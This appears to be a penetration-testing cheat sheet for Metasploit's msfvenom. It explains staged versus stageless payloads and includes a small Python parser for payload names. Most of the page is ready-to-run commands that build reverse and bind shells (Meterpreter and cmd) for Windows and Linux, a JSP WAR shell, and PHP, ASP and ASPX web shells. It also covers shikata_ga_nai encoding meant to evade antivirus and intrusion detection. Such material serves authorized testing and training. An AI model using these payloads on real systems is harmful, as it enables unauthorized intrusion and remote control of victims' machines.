MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.

Staged Payloads

Staged payloads send a small initial payload (stager) to the target. The stager executes on the target machine and then connects back to the attacker’s machine to download the remaining payload. Once the full payload is received, it executes and establishes a connection.

Stageless Payloads

Stageless payloads do not use stages. The attacker sends the full payload to the target, which executes immediately and establishes a connection.

A quick way to tell the difference between staged and stageless payloads is by their naming convention.

  • Staged payloads (e.g., windows/meterpreter/reverse_tcp) use a slash between the stage (meterpreter) and the stager that fetches it (reverse_tcp).

  • Stageless payloads (e.g., windows/meterpreter_reverse_tcp) join the shell and its network transport with an underscore in a single name, because everything ships in one binary.
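The naming convention above is regular enough to parse mechanically, which is useful when triaging a sample or a handler configuration. The parser below is an added example, not part of the original page or of Metasploit; it assumes the path shape platform[/arch]/stage/stager for staged names and platform[/arch]/stage_transport for stageless names, with transports starting with reverse_ or bind_.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Assumed convention (not an official Metasploit API): an optional arch
# component follows the platform, transports start with reverse_ or bind_.
_TRANSPORT = re.compile(r"^(reverse|bind)_[a-z0-9_]+$")
_STAGELESS = re.compile(r"^(.+?)_((?:reverse|bind)_[a-z0-9_]+)$")
_ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}


@dataclass
class PayloadName:
    platform: str
    arch: Optional[str]
    stage: str       # e.g. "meterpreter", "shell", "jsp_shell"
    transport: str   # e.g. "reverse_tcp", "bind_tcp"
    staged: bool     # True when stage and stager are separated by "/"


def parse_payload_name(name: str) -> PayloadName:
    """Classify an msfvenom payload path as staged or stageless."""
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a platform/payload path: {name!r}")
    platform = parts[0]
    arch = parts[1] if len(parts) > 2 and parts[1] in _ARCHES else None
    rest = parts[2:] if arch else parts[1:]
    # Staged: slash between stage and stager, e.g. meterpreter/reverse_tcp
    if len(rest) == 2 and _TRANSPORT.match(rest[1]):
        return PayloadName(platform, arch, rest[0], rest[1], True)
    # Stageless: stage and transport joined by "_", e.g. meterpreter_reverse_tcp
    if len(rest) == 1:
        m = _STAGELESS.match(rest[0])
        if m:
            return PayloadName(platform, arch, m.group(1), m.group(2), False)
    raise ValueError(f"unrecognised payload naming: {name!r}")


if __name__ == "__main__":
    # Constructed sample names taken from the cheatsheet above
    for n in ("windows/x64/meterpreter/reverse_tcp",
              "windows/x64/shell_bind_tcp",
              "java/jsp_shell_reverse_tcp"):
        p = parse_payload_name(n)
        print(f"{n:40} {'staged' if p.staged else 'stageless':9} "
              f"stage={p.stage} transport={p.transport}")
```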

These are the most commonly used shell payloads for remote access and command execution:

MSFvenom - Windows Reverse

# Stageless payloads - netcat listener
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o stageless.exe
 
# Stageless payloads - msfconsole listener
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o stageless.exe
 
# Staged payloads - meterpreter shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o staged.exe
 
# Staged payloads - cmd shell
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o staged.exe

MSFvenom - Windows Bind

# Stageless payloads - netcat listener
msfvenom -p windows/x64/shell_bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o stageless.exe
 
# Stageless payloads - msfconsole listener
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o stageless.exe
 
# Staged payloads - meterpreter shell
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o staged.exe
 
# Staged payloads - cmd shell
msfvenom -p windows/x64/shell/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o staged.exe

MSFvenom - Linux Reverse

# Stageless payloads - netcat listener
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f elf -o stageless
 
# Stageless payloads - msfconsole listener
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f elf -o stageless
 
# Staged payloads - meterpreter shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f elf -o staged
 
# Staged payloads - cmd shell
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$IP LPORT=4444 -f elf -o staged

MSFvenom - Linux Bind

# Stageless payloads - netcat listener
msfvenom -p linux/x64/shell_bind_tcp RHOST=$TARGET_IP LPORT=4444 -f elf -o stageless
 
# Staged payloads - meterpreter shell
msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f elf -o staged
 
# Staged payloads - cmd shell
msfvenom -p linux/x64/shell/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f elf -o staged

WAR File - Reverse

A Web Application Resource or Web application ARchive (WAR) is a JAR-format archive used to package and deploy a Java web application (its JSPs, servlets, classes and bundled JAR libraries) to a servlet container such as Tomcat.

# Stageless payloads - netcat listener
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=4444 -f war -o shell.war

PHP - Reverse

PHP is a general-purpose scripting language geared towards web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995.

# Stageless payloads - exploit/multi/handler listener
msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f raw > shell.php

ASP - Reverse

Active Server Pages (ASP) is Microsoft's first server-side scripting language and engine for dynamic web pages.
Classic ASP runs on IIS; ASPX (ASP.NET) runs on the .NET Framework, so the two need different output formats from msfvenom.

# ASP
# Staged payloads - meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f asp > shell.asp
 
# ASPX
# Staged payloads - meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f aspx > shell.aspx

Encoders

Encoders are used to transform the payload by encoding it, often to avoid detection by security tools like antivirus (AV) or intrusion detection systems (IDS).

Shikata Ga Nai (仕方がない), meaning "nothing can be done", is a polymorphic XOR additive-feedback encoder and was long the most commonly used scheme because each run produces a different decoder stub, making static signatures hard to write. Today, however, most antivirus products detect it reliably.

# List available encoders
msfvenom -l encoders
 
# Example using an encoder with -i / --iterations (number of encoding passes applied to the payload)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -e x86/shikata_ga_nai -f exe -i 10 -o shell.exe